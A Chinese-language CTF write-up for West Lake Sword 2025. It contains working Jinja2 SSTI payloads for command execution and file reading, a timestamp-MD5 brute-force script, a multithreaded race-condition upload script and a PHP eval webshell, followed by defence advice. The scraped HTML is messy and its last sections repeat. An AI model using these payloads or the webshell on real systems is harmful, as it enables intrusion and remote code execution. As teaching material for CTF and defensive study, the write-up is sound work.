西湖论剑2025 Web&Misc解析 - 详细教学文档<\/h1>

Web1 - 命令执行绕过<\/h2>

1. SSTI (Server-Side Template Injection) 利用<\/h3>

攻击向量<\/strong>:<\/p>

{{lipsum|<\/span>attr('__globals__'<\/span>)|<\/span>attr('__getitem__'<\/span>)('os'<\/span>)|<\/span>attr('popen'<\/span>)("cd+..<\/span>%26%<\/span>26cd+..<\/span>%26%<\/span>26cd+..<\/span>%26%<\/span>26ls"<\/span>)|<\/span>attr('read'<\/span>)()}}
<\/span><\/span><\/code><\/pre>技术解析<\/strong>:<\/p>

lipsum<\/code> 是Jinja2模板中的一个内置函数<\/li>
|attr()<\/code> 过滤器用于访问对象的属性<\/li>
通过链式调用访问 __globals__<\/code> 字典获取 os<\/code> 模块<\/li>
使用 popen()<\/code> 执行系统命令<\/li>
URL编码的命令：cd .. && cd .. && cd .. && ls<\/code> 用于遍历目录<\/li>
<\/ol>
2. 文件读取技巧<\/h3>
攻击向量<\/strong>:<\/p>
{{x.<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>].<\/span>open('<\/span>\x2f\x66\x6c\x61\x67\x66\x31\x34\x39<\/span>'<\/span>, 'r'<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre>技术解析<\/strong>:<\/p>

通过对象的 __init__<\/code> 方法访问 __globals__<\/code><\/li>
获取 __builtins__<\/code> 中的 open<\/code> 函数<\/li>
使用十六进制编码绕过可能的过滤：\x2f\x66\x6c\x61\x67\x66\x31\x34\x39<\/code> = \/flagf149<\/code><\/li>
直接读取文件内容<\/li>
<\/ol>
Web2 - 文件上传与条件竞争<\/h2>
1. 初始访问<\/h3>

爆破弱密码成功：admin\/year2000<\/code><\/li>
可以上传PHP文件但访问不到（后端自动删除）<\/li>
<\/ul>
2. 时间戳MD5预测攻击<\/h3>
攻击原理<\/strong>:<\/p>

后端使用时间戳的MD5作为文件名<\/li>
上传文件获取临时文件名<\/li>
爆破时间戳范围计算MD5匹配<\/li>
<\/ol>
关键代码<\/strong>:<\/p>
start =<\/span> int(time.<\/span>time())
<\/span><\/span># 上传文件获取tmpmd5<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(start-<\/span>3000<\/span>, end+<\/span>3000<\/span>):
<\/span><\/span>    md5_hash =<\/span> hashlib.<\/span>md5(str(i).<\/span>encode()).<\/span>hexdigest()
<\/span><\/span>    if<\/span> md5_hash ==<\/span> tmpmd5:
<\/span><\/span>        print(i)  # 找到正确的时间戳<\/span>
<\/span><\/span><\/code><\/pre>3. 条件竞争绕过<\/h3>
多线程攻击策略<\/strong>:<\/p>

一个线程不断上传webshell<\/li>
另一个线程不断尝试访问上传的文件<\/li>
利用时间差在文件被删除前访问<\/li>
<\/ol>
关键代码<\/strong>:<\/p>
def<\/span> getfile<\/span>():
<\/span><\/span>    while<\/span> True<\/span>:
<\/span><\/span>        res =<\/span> session.<\/span>get(url +<\/span> filename)
<\/span><\/span>        if<\/span> "321321"<\/span> in<\/span> res.<\/span>text:  # 检测webshell是否成功执行<\/span>
<\/span><\/span>            print("ok"<\/span>)
<\/span><\/span>            return<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> uploadfile<\/span>():
<\/span><\/span>    while<\/span> True<\/span>:
<\/span><\/span>        res =<\/span> session.<\/span>post(burp0_url, data=<\/span>burp0_data)
<\/span><\/span>        filename =<\/span> re.<\/span>findall(r<\/span>"\/Uploads\/.*\/(.*)<"<\/span>, res.<\/span>text)[0<\/span>]
<\/span><\/span>
<\/span><\/span># 启动50个线程<\/span>
<\/span><\/span>for<\/span> _ in<\/span> range(50<\/span>):
<\/span><\/span>    threading.<\/span>Thread(target=<\/span>uploadfile).<\/span>start()
<\/span><\/span>    threading.<\/span>Thread(target=<\/span>getfile).<\/span>start()
<\/span><\/span><\/code><\/pre>最终webshell<\/strong>:<\/p>
<?<\/span>php<\/span> file_put_contents<\/span>('\/var\/www\/html\/admin\/Uploads\/...\/shell.php'<\/span>,'<?php eval($_POST[1]);'<\/span>);echo<\/span> 321321<\/span>;?><\/span>
<\/span><\/span><\/span><\/code><\/pre>4. 绕过disable_functions<\/h3>

使用蚁剑插件绕过PHP的禁用函数限制<\/li>
<\/ul>
Web3 - SQL注入绕过<\/h2>
1. 题目特点<\/h3>

源码中使用了String.prototype.replace()<\/code>过滤逗号<\/li>
<\/ul>
2. 绕过技术<\/h3>

利用分开传参绕过逗号限制<\/li>
利用JavaScript字符串替换的特性构造payload<\/li>
<\/ul>
Misc - easydatalog<\/h2>
1. 流量分析<\/h3>

数据包中包含加密的蚁剑流量<\/li>
需要解密分析<\/li>
<\/ul>
2. 密码破解<\/h3>

存在password.jpg文件但密码未知<\/li>
尝试傅里叶频域变换分析图片隐写<\/li>
<\/ul>
防御建议<\/h2>
针对Web1<\/h3>

禁用或严格过滤模板引擎中的危险函数<\/li>
实施严格的输入验证和输出编码<\/li>
限制模板中可以访问的对象和方法<\/li>
<\/ol>
针对Web2<\/h3>

使用强密码策略<\/li>
文件上传采用不可预测的命名方案<\/li>
实施文件内容检查而非仅依赖扩展名<\/li>
考虑使用单独的服务处理文件上传<\/li>
<\/ol>
针对Web3<\/h3>

使用参数化查询而非字符串拼接<\/li>
实施最小权限原则<\/li>
对输入进行严格类型检查和过滤<\/li>
<\/ol>
针对Misc<\/h3>

加密流量使用强加密算法<\/li>
避免在图片中存储敏感信息<\/li>
实施完善的密钥管理策略<\/li>
<\/ol>

西湖论剑2025 Web&Misc解析 - 详细教学文档<\/h1>

Web1 - 命令执行绕过<\/h2>

Web2 - 文件上传与条件竞争<\/h2>

Web3 - SQL注入绕过<\/h2>

Misc - easydatalog<\/h2>

防御建议<\/h2>

针对Web3<\/h3> 使用参数化查询而非字符串拼接<\/li> 实施最小权限原则<\/li> 对输入进行严格类型检查和过滤<\/li> <\/ol> 针对Misc<\/h3> 加密流量使用强加密算法<\/li> 避免在图片中存储敏感信息<\/li> 实施完善的密钥管理策略<\/li> <\/ol>

针对Misc<\/h3> 加密流量使用强加密算法<\/li> 避免在图片中存储敏感信息<\/li> 实施完善的密钥管理策略<\/li> <\/ol>

针对Misc<\/h3>

加密流量使用强加密算法<\/li>
避免在图片中存储敏感信息<\/li>
实施完善的密钥管理策略<\/li> <\/ol>